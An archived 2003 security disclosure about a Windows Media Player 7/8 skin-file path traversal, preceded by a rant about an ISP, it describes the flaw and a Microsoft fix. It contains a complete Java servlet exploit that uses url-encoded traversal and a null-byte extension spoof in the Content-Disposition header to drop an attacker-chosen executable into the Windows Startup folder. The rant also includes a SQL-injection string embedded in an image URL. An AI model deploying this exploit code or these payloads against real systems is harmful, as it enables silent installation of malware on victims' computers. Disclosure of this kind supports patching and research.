TUCoPS :: Windows Apps :: bt143.txt

Windows MediaPlayer


------=_NextPart_000_0005_01C3150D.8A74BB90
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Why i love xs4all rant (you'll probably wanna skip this but i need to get
this out of my system):

    a few weeks back i was unpleasantly suprised by the fact that my
internet wasn't working
    the support desk employee after making me reset my modem a dozen times
and tripple checking
    my settings finaly found out that i had an abuse ticket.
    I supposedly portscanned (a harmless process) :S some poor guy who felt
the need to complain about it. They wouldn't tell me who
    it was when it happened or anything. being the second warning (over a 2
year!! period) they descided they
    had no other alternative then to shut me down. I am not aware of
anything i have done wrong, but i am not
    given any option to defend myself against the allergations, I dont just
randomly portscan people.

    In essense you are conficted without even hearing the evidence or being
apointed a lawyer.
    This is a really scary thought because in essence any of the following
situations will lead to cancelation of
    your account

    You activly seek out flaws in a website, you report them to a website
owner, he doesn't like this and rather than
    fix the problem notifies your ISP xs4all to complain about it. resulting
in cancelation of your account.
    You wont even know who complained because and explain the whole thing
because xs4all grants the complaining
    party anonimity

    You get hacked and someone uses your machine to do something nasty

    An online chatbuddy asks you to nmap his machine to see if the firewall
he set up is working properly
    after a while the friendship goes sour and just to piss you off he
reports the scanning.

    someone sends you an email containing all sorts of
    <img src="http://www.mysite.com/login.asp?username=a'or 1=1;--">
    kinda stuff, look xs4all!! he hacked my site , just look at my logs and
xs4all's connection logs
    will show the connections where made from your ip matching the
timestamps in the log

    probably a dozen other ways are possible, and there's no way to find out
what has been going on
    this shielding of the sources is ridiculous, what will i do tell the
world i nmapped him?
    well whoopdiedoo call out the witness protection program

    Particularly cute is the other day i see an interview with cor bosman
telling how xs4all
    founders where titled the hacker thread from holland etc
    I have a 4 letter acronym for him, you figure it out


Description :

    Windows Media Player allows you to play audio and video files
    locally stored and streamed from the Internet.
    It includes a visualizer, a jukebox, a media guide,
    an Internet radio tuner, and support for
    countless media formats and various external devices.
    There is is a flaw in Windows media player 7 and 8 that allows
    execution of arbitrary code
    Vulnerable versions are shipped by default with
    all recent windows distributions including 98 and 2000 and xp


Details :

    Windows media player skin (.WMZ) files are automaticly opened by
internet explorer
    As a security precaution they are placed in a folder with a random name
similar to this :

    C:\Program Files\Windows Media Player\Skins\004B1813

    However this can be trivially defeated by setting the following http
headers.

    Content-Disposition: filename=%2e%2e%5cjelmer.wmz
    Content-Type: application/download

    <content follows>

    %2e%2e%5cjelmer.wmz is the url encoded path ..\jelmer.wmz , windows
media player urldecodes this and the
    path becomes :

    C:\Program Files\Windows Media Player\Skins\004B1813\..\jelmer.wmz

    witch is equivilent to

    C:\Program Files\Windows Media Player\Skins\jelmer.wmz

    witch is a known location on the filesystem, witch is a "very bad thing"
(tm)
    to make matters worse we could append an urlencoded null byte to the
file name and "spoof" the extention
    like this


"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20User
s%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz

    witch drops an executable in the windows startup folder (on an english
xp system)


Systems affected :

    Both media player 7.1 and 8 are affected by the flaw, 9 proofed
unaffected


Example :

    I should have attached a sample exploit


Vendor status :

    Microsoft was notified 23-03-2003 and has issued a fix the details are
available at

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-017.asp
    Credit was shared because apperently Jouko reported the same issue at
aproximatly the same time

Solution :

    Update to the latest version of media player


------=_NextPart_000_0005_01C3150D.8A74BB90
Content-Type: application/octet-stream;
	name="MediaPlayerExploit.java"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="MediaPlayerExploit.java"

import javax.servlet.http.HttpServlet;=20
import javax.servlet.http.HttpServletRequest;=20
import javax.servlet.http.HttpServletResponse;=20
import javax.servlet.ServletException;=20
import javax.servlet.ServletOutputStream;=20
import java.io.*;=20
=20
/**=20
 *=20
 * Microsoft media player 8 Exploit for windows XP English and Dutch =
versions=20
 *=20
 * It will drop a file in the startup folder=20
 *=20
 * modify web.xml to change what will be uploaded=20
 *=20
 * @author Jelmer Kuperus=20
 *=20
 */=20
=20
public class MediaPlayerExploit extends HttpServlet {=20
=20
    private static final int BUFFER_SIZE =3D 1024;=20
=20
    private static final String[] paths =3D new String[] {=20
        =
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20U=
sers%5CStart%20Menu%5CPrograms%5CStartup%5c", // English=20
        =
"%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20U=
sers%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch=20
    };=20
=20
    private String payload;=20
=20
=20
    public void init() throws ServletException {=20
        payload =3D getInitParameter("executable");=20
    }=20
=20
    public void doGet(HttpServletRequest request, HttpServletResponse =
response) throws ServletException, IOException {=20
=20
        int language =3D 0; // default to english=20
=20
        try {=20
            language =3D =
Integer.parseInt(request.getParameter("language"));=20
        } catch (NumberFormatException ignored) {}=20
=20
        String path =3D paths[language];=20
=20
        File file =3D new File(payload);=20
=20
        ServletOutputStream sos =3D response.getOutputStream();=20
=20
        response.setContentType("application/download");=20
        response.setHeader("Content-Disposition","filename=3D" + path + =
file.getName() + "%00.wmz");=20
=20
        BufferedInputStream bis =3D new BufferedInputStream(new =
FileInputStream(file));=20
        BufferedOutputStream bos =3D new BufferedOutputStream(sos);=20
=20
        byte buffer[] =3D new byte[BUFFER_SIZE];=20
=20
        int datalength =3D 0;=20
        while ( (datalength =3D bis.read(buffer,0,BUFFER_SIZE)) > 0) {=20
            bos.write(buffer,0,datalength);=20
        }=20
        bis.close();=20
        bos.close();=20
    }=20
=20
    public void doPost(HttpServletRequest request, HttpServletResponse =
response) throws ServletException, IOException {=20
        doGet(request, response);=20
    }=20
=20
}=20

------=_NextPart_000_0005_01C3150D.8A74BB90--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH